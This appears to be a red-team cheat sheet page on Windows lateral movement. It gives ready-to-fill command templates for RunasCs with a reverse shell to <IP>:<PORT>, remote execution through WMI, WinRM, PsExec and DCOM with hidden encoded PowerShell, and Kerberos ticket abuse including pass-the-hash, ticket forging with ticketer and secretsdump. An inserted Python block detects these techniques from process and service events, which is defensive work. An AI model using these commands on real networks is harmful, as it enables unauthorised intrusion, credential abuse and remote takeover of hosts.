# Lateral Movement

## RunAs

Use the **runas** command to execute commands on behalf of another user on the same host.

{% code overflow="wrap" %}

```powershell
runas /user:<USER> <COMMAND, ex. cmd>
# or: launch cmd elevated through the UAC prompt (prompts for an administrator's credentials if the current user is not one)
Start-Process cmd.exe -Verb runAs
```

{% endcode %}

You can also use [RunasCs.ps1](https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1) or [RunasCs.exe](https://github.com/antonioCoco/RunasCs/releases) to run commands as a user who is not authorized for remote access, from the session of a user who is.

{% code overflow="wrap" %}

```powershell
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs <USER> <PASS> "cmd /c whoami /all"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# -r is a RunasCs option (not part of the command string): it redirects the spawned process's stdin/stdout/stderr to <IP>:<PORT>
.\RunasCs.exe <USER> <PASS> cmd.exe -r <IP>:<PORT>
```

{% endcode %}

## [WMI](/rednote/utility/service/wmi-135.md)

We need the credentials of a member of the ***Administrators*** local group on the target host.

{% tabs %}
{% tab title="Windows" %}
{% code title="CMD" overflow="wrap" %}

```powershell
wmic /node:<IP> /user:<USER> /password:<PASS> process call create "<COMMAND>"
```

{% endcode %}

{% code title="PowerShell" overflow="wrap" %}

```powershell
$credential = New-Object System.Management.Automation.PSCredential '<USER>', (ConvertTo-SecureString '<PASS>' -AsPlainText -Force)
$Session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption (New-CimSessionOption -Protocol DCOM)
$command = '<COMMAND>';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
```

{% endcode %}
{% endtab %}

{% tab title="Linux" %}
With [wmiexec](https://github.com/fortra/impacket/blob/master/examples/wmiexec.py)

```bash
wmiexec <USER>@<IP>
```

{% endtab %}
{% endtabs %}

## [WinRM](/rednote/utility/service/winrm-5985-5986.md)

We need the credentials of a member of the ***Administrators*** local group or ***Remote Management Users*** group on the target host.

{% tabs %}
{% tab title="Windows" %}
{% code title="CMD" overflow="wrap" %}

```powershell
winrs -r:<HOST> -u:<USER> -p:<PASS> "cmd /c <COMMAND>"
```

{% endcode %}

{% code title="PowerShell" overflow="wrap" %}

```powershell
$credential = New-Object System.Management.Automation.PSCredential '<USER>', (ConvertTo-SecureString '<PASS>' -AsPlainText -Force)
New-PSSession -ComputerName <IP> -Credential $credential
# See ID in the output
Enter-PSSession <ID>
```

{% endcode %}
{% endtab %}

{% tab title="Linux" %}
With [evil-winrm](https://github.com/Hackplayers/evil-winrm)

```bash
evil-winrm -i <IP> -u <USER>[@<DOMAIN>]
```

{% endtab %}
{% endtabs %}

## PsExec

We need the credentials of a member of the ***Administrators*** local group, the *ADMIN$* share available and File and Printer Sharing turned on (both default settings on modern Windows Server systems).

<details>

<summary>Details</summary>

To execute the command remotely, PsExec performs the following tasks:

* Writes **psexesvc.exe** into the **C:\Windows** directory
* Creates and spawns a service on the remote host
* Runs the requested program/command as a child process of **psexesvc.exe**

</details>

{% tabs %}
{% tab title="Windows" %}
[psexec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec) is not installed by default on Windows, so we need to transfer it.

{% code title="CMD" overflow="wrap" %}

```powershell
# \\<HOST> comes first; -i runs the command interactively in the remote desktop session
.\PsExec64.exe \\<HOST> -u <DOMAIN>\<USER> -p <PASS> -i cmd
```

{% endcode %}
{% endtab %}

{% tab title="Linux" %}
With [psexec](https://github.com/fortra/impacket/blob/master/examples/psexec.py)

```bash
psexec <USER>@<IP>
```

{% endtab %}
{% endtabs %}

## DCOM

Interaction with DCOM is performed over RPC on TCP port 135 and local ***Administrator*** access is required to call the DCOM Service Control Manager, which is essentially an API.

{% code overflow="wrap" %}

```powershell
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP_TARGET>")).Document.ActiveView.ExecuteShellCommand("powershell",$null,"-nop -w hidden -e <COMMAND_B64>","7")
```

{% endcode %}
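Added example (Python, not part of this page or of the tools it links): the four remote-execution techniques above each spawn the requested command under a characteristic parent process (WmiPrvSE.exe for WMI, wsmprovhost.exe for WinRM, PSEXESVC.exe for PsExec, mmc.exe for the MMC20 DCOM object), and PsExec additionally installs the PSEXESVC service, so a defender can match on those artifacts. Field names loosely follow Sysmon/Windows event fields and the sample events are constructed.

```python
import ntpath  # handles Windows paths even when the script runs on Linux

# Parent process each remote-execution technique on this page spawns its command from.
SUSPICIOUS_PARENTS = {
    "wmiprvse.exe": "WMI (Win32_Process.Create)",
    "wsmprovhost.exe": "WinRM (winrs / Enter-PSSession)",
    "psexesvc.exe": "PsExec (child of the PSEXESVC service)",
    "mmc.exe": "DCOM (MMC20.Application ExecuteShellCommand)",
}
# Only shells and script hosts; other children of these parents are mostly benign noise.
INTERESTING_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def classify(event):
    """Return a technique label for one event dict, or None if it looks benign."""
    kind = event.get("EventType")
    if kind == "ServiceInstall":  # System log, Event ID 7045
        name = event.get("ServiceName", "").lower()
        path = ntpath.basename(event.get("ImagePath", "").strip('"')).lower()
        if name == "psexesvc" or path == "psexesvc.exe":
            return "PsExec (PSEXESVC service installed)"
        return None
    if kind == "ProcessCreate":  # Sysmon Event ID 1 / Security 4688
        parent = ntpath.basename(event.get("ParentImage", "")).lower()
        child = ntpath.basename(event.get("Image", "")).lower()
        if parent in SUSPICIOUS_PARENTS and child in INTERESTING_CHILDREN:
            return SUSPICIOUS_PARENTS[parent]
    return None

def scan(events):
    """Yield (host, technique, command) for every event that matches a rule."""
    for ev in events:
        label = classify(ev)
        if label:
            yield (ev.get("Computer"), label, ev.get("CommandLine") or ev.get("ImagePath"))

# Constructed sample telemetry (hostnames, paths and command lines are placeholders).
SAMPLE_EVENTS = [
    {"EventType": "ServiceInstall", "Computer": "SRV01", "ServiceName": "PSEXESVC",
     "ImagePath": r"C:\Windows\PSEXESVC.exe"},
    {"EventType": "ProcessCreate", "Computer": "SRV01", "CommandLine": "cmd",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\PSEXESVC.exe"},
    {"EventType": "ProcessCreate", "Computer": "SRV02", "CommandLine": "cmd /c whoami",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"EventType": "ProcessCreate", "Computer": "SRV03", "CommandLine": "powershell -nop -w hidden -e <B64>",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\mmc.exe"},
    {"EventType": "ProcessCreate", "Computer": "WS01", "CommandLine": "notepad",
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]
```

Running `list(scan(SAMPLE_EVENTS))` returns the PsExec service install, the PsExec, WMI and DCOM child processes, and nothing for the explorer.exe/notepad.exe event.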

## Kerberos Tickets

Set `/etc/hosts` and `/etc/krb5.conf`

{% code title="/etc/hosts" overflow="wrap" %}

```
<IP>     <DOMAIN.COM> <DC.DOMAIN.COM>
```

{% endcode %}

{% code title="/etc/krb5.conf" overflow="wrap" %}

```
[libdefaults]
  default_realm = <DOMAIN.COM>
  forwardable = yes
  dns_lookup_kdc = false
  dns_lookup_realm = false

[realms]
  <DOMAIN.COM> = {
    kdc = <DC.DOMAIN.COM>
  }
```

{% endcode %}

Get the `TGT`

{% code overflow="wrap" %}

```bash
getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>:<PASS>'
getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>' -hashes :<HASH>
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <NEW_USER>
# or with other techniques
```

{% endcode %}

Import it

{% code overflow="wrap" %}

```bash
chmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klist
```

{% endcode %}

Use with Kerberos authentication (`-k`)

```bash
nxc smb <IP_TARGET> --use-kcache --kdcHost <HOSTNAME_DC>
psexec.py -k -no-pass -dc-ip <DC_IP> [-target-ip <IP_TARGET>] <HOSTNAME_TARGET>
# also with impacket-secretsdump, impacket-wmiexec, etc.
```
